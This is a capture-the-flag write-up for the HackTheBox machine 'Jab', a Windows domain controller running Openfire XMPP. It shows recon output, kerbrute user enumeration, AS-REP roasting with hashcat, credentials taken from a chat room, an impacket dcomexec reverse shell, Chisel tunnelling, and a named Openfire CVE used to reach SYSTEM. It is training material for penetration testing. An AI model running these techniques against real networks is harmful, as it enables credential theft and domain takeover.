Jab

Recon

Let's start with an nmap scan.

┌──(kali㉿kali)-[~/Desktop/HTB/Jab]
└─$ nmap -p- -T4 jab.htb                                                                                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 08:17 BST
Nmap scan report for jab.htb (10.10.11.4)
Host is up (0.044s latency).
Not shown: 65459 closed tcp ports (conn-refused), 40 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5222/tcp  open  xmpp-client
5223/tcp  open  hpvirtgrp
5262/tcp  open  unknown
5263/tcp  open  unknown
5269/tcp  open  xmpp-server
5270/tcp  open  xmp
5275/tcp  open  unknown
5276/tcp  open  unknown
5985/tcp  open  wsman
7070/tcp  open  realserver
7443/tcp  open  oracleas-https
7777/tcp  open  cbt
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49681/tcp open  unknown
49790/tcp open  unknown
53728/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 301.96 seconds

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/HTB/Jab]
└─$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49681,49790,53728 -sC -sV -T4 jab.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 08:27 BST
Nmap scan report for jab.htb (10.10.11.4)
Host is up (0.044s latency).

PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-04-22 07:23:30Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-22T07:24:48+00:00; -4m13s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-04-22T07:24:46+00:00; -4m14s from scanner time.
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-04-22T07:24:48+00:00; -4m13s from scanner time.
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-22T07:24:46+00:00; -4m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
5222/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 8mjpiz9qic
5223/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|     auth_mechanisms: 
|_    capabilities: 
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5262/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 55iww1rf7w
5263/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|     auth_mechanisms: 
|_    capabilities: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   Respects server name
|   info: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|   pre_tls: 
|     xmpp: 
|     capabilities: 
|     features: 
|       TLS
|       Server Dialback
|   post_tls: 
|     xmpp: 
|       lang: en-US
|_    capabilities: 
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5275/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 7529c6ngrx
5276/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|     auth_mechanisms: 
|_    capabilities: 
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7070/tcp  open  realserver?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 22 Apr 2024 07:23:29 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 22 Apr 2024 07:23:35 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp  open  ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 22 Apr 2024 07:23:36 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 22 Apr 2024 07:23:41 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
7777/tcp  open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49671/tcp open  msrpc               Microsoft Windows RPC
49674/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc               Microsoft Windows RPC
49676/tcp open  msrpc               Microsoft Windows RPC
49681/tcp open  msrpc               Microsoft Windows RPC
49790/tcp open  msrpc               Microsoft Windows RPC
53728/tcp open  msrpc               Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7070-TCP:V=7.94SVN%I=7%D=4/22%Time=6626116F%P=x86_64-pc-linux-gnu%r
...
SF:h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7443-TCP:V=7.94SVN%T=SSL%I=7%D=4/22%Time=66261175%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,189,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2022\x2
SF:0Apr\x202024\x2007:23:36\x20GMT\r\nLast-Modified:\x20Wed,\x2016\x20Feb\
...
SF:0400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre>");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-04-22T07:24:39
|_  start_date: N/A
|_clock-skew: mean: -4m13s, deviation: 0s, median: -4m13s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.01 seconds

There are numerous open ports on this Windows system. Looking through the output we also see several hostnames (jab.htb and dc01.jab.htb). To be able to resolve them, we add entries for them to our /etc/hosts file.

At first glance, open ports 88 (Kerberos) and 389 (LDAP) tell us this is a domain controller. We can also notice some non-standard ports: 5222, 5269, 7070, 7443 and 7777. From the same Nmap result we can see that this machine is running the XMPP (Jabber) protocol, served by Ignite Realtime Openfire.

Doing some googling, we learn that this is a messaging service; let's dig into it to learn more.

First of all we need a way to interact with this service, and again a bit of googling turns up something interesting.

Since we've identified that the machine is running the server, we now need a client to talk to it. As XMPP is a well-known, open protocol, finding a suitable client is straightforward.

Let's pick Pidgin as our client, since it's easy to install and use.

To access the chatroom, you'll need to create an account on the server. Once you've done that, you can join the test2@conference.jab.htb chat room. However, if there's no one currently present in the chat room, you may not find anyone to interact with. In such a case, you can leave the chat room.

Additionally, using Pidgin's XMPP Service Discovery plugin we can browse the services and chat rooms the server exposes.
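What that plugin does on the wire is a XEP-0030 disco#items exchange with the conference service. As an added illustration (not code from the writeup, and not something Pidgin or Openfire ship), here is the request stanza a client sends and a parser for the reply; the reply is constructed to mirror the rooms named in this writeup, not captured from the box.

```python
# Added example: XEP-0030 service discovery (disco#items) request and reply parsing,
# built with only the standard library. The reply below is constructed, not captured.
import xml.etree.ElementTree as ET

DISCO_ITEMS = "http://jabber.org/protocol/disco#items"


def build_disco_items_iq(sender: str, target: str, iq_id: str) -> str:
    """Build the IQ 'get' a client sends to list a service's items (e.g. MUC rooms)."""
    iq = ET.Element("iq", {"type": "get", "from": sender, "to": target, "id": iq_id})
    ET.SubElement(iq, "query", {"xmlns": DISCO_ITEMS})
    return ET.tostring(iq, encoding="unicode")


def parse_disco_items(stanza: str, expected_id: str) -> list[tuple[str, str]]:
    """Return (jid, name) pairs from a disco#items result.

    Rejects stanzas whose id does not match our request (a basic spoofing check)
    and raises PermissionError for an error reply, e.g. a server that restricts
    room listing to authorised users.
    """
    root = ET.fromstring(stanza)
    if root.tag.split("}")[-1] != "iq" or root.get("id") != expected_id:
        raise ValueError("unexpected stanza or id mismatch")
    if root.get("type") == "error":
        err = root.find("error")
        cond = next((c.tag.split("}")[-1] for c in err), "unknown") if err is not None else "unknown"
        raise PermissionError(f"disco#items refused: {cond}")
    query = root.find(f"{{{DISCO_ITEMS}}}query")
    if query is None:
        raise ValueError("no disco#items query in result")
    return [(it.get("jid"), it.get("name", "")) for it in query.findall(f"{{{DISCO_ITEMS}}}item")]


# Constructed server reply shaped like an Openfire MUC service listing the two rooms
# mentioned in this writeup (a real server only lists rooms visible to the requester).
SAMPLE_REPLY = (
    '<iq type="result" from="conference.jab.htb" to="jmontgomery@jab.htb/pidgin" id="disco1">'
    '<query xmlns="http://jabber.org/protocol/disco#items">'
    '<item jid="test2@conference.jab.htb" name="test2"/>'
    '<item jid="pentest2003@conference.jab.htb" name="Pentest2003"/>'
    "</query></iq>"
)

if __name__ == "__main__":
    print(build_disco_items_iq("jmontgomery@jab.htb/pidgin", "conference.jab.htb", "disco1"))
    for jid, name in parse_disco_items(SAMPLE_REPLY, "disco1"):
        print(f"{name:12} {jid}")
```

From the defender's side, the useful knob is the MUC service's room-listing and join permissions: a room like Pentest2003 being discoverable and joinable by any account is what leaked the credentials in this box.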

As a very first step we can try to enumerate all users inside the jab.htb domain. To do that we need:

A user list available online (we use jsmith.txt).

A tool to send requests to the DC; we use kerbrute.

kerbrute userenum --dc dc01.jab.htb -d jab.htb -v jsmith.txt --hash-file NP.txt | tee kerbrute.out

Another important result of this step is the harvesting of AS-REP hashes (the encrypted part of the TGT reply) for some users. This is possible because those accounts have Kerberos pre-authentication disabled, which makes them vulnerable to AS-REP roasting: anyone who knows the username can request a TGT and crack the reply offline.

Run hashcat on those hashes (mode 18200, Kerberos 5 AS-REP etype 23) using rockyou.txt:

hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt

We get the password of jmontgomery. Now we can go back to Pidgin and log in using those credentials.

After logging in we search for rooms again and find a new one: Pentest2003.

Joining that room gives us the password of svc_openfire.

Initial Access

Using Impacket's dcomexec.py and svc_openfire's credentials we can get a reverse shell (replace Password and command with the real values):

impacket-dcomexec 'jab.htb/svc_openfire:Password@dc01.jab.htb' 'command' -nooutput -object MMC20 -dc-ip 10.10.11.4

We have our user flag.

Privilege Escalation

Further enumeration on the box reveals two unusual ports, 9090 and 9091, listening only on localhost.

netstat -ano | findstr '127.0.0.1:'

We can test whether we have a web app:

Invoke-WebRequest -Uri http://127.0.0.1:9090/ -UseBasicParsing

The HTTP/1.1 200 OK response tells us a web application is indeed running locally. To interact with it we need to forward the port from the DC back to our attack box so the service is reachable locally on our side. We'll use the well-known tool Chisel for this.

First we need to set up a Chisel server on our attack box:

chisel server -p 9999 --reverse

Next, we transfer Chisel to the DC and start a client there that connects back to our server. Note that we need a Linux build of Chisel for Kali and a Windows build for the target system.

./chisel client 10.10.14.140:9999 R:9090:127.0.0.1:9090

Now, by navigating to http://127.0.0.1:9090, we gain access to and can interact with this web application.

We can log in with the svc_openfire username and the password we found earlier.

This web application is the Openfire admin console, and this version is vulnerable to CVE-2023-32315 (an authentication bypass in the admin console, fixed in Openfire 4.6.8 and 4.7.5).

Exploiting it gives us command execution as SYSTEM, the account the Openfire service runs as on this box.

We set up another netcat listener to catch a reverse shell as SYSTEM.

We've got our root flag.
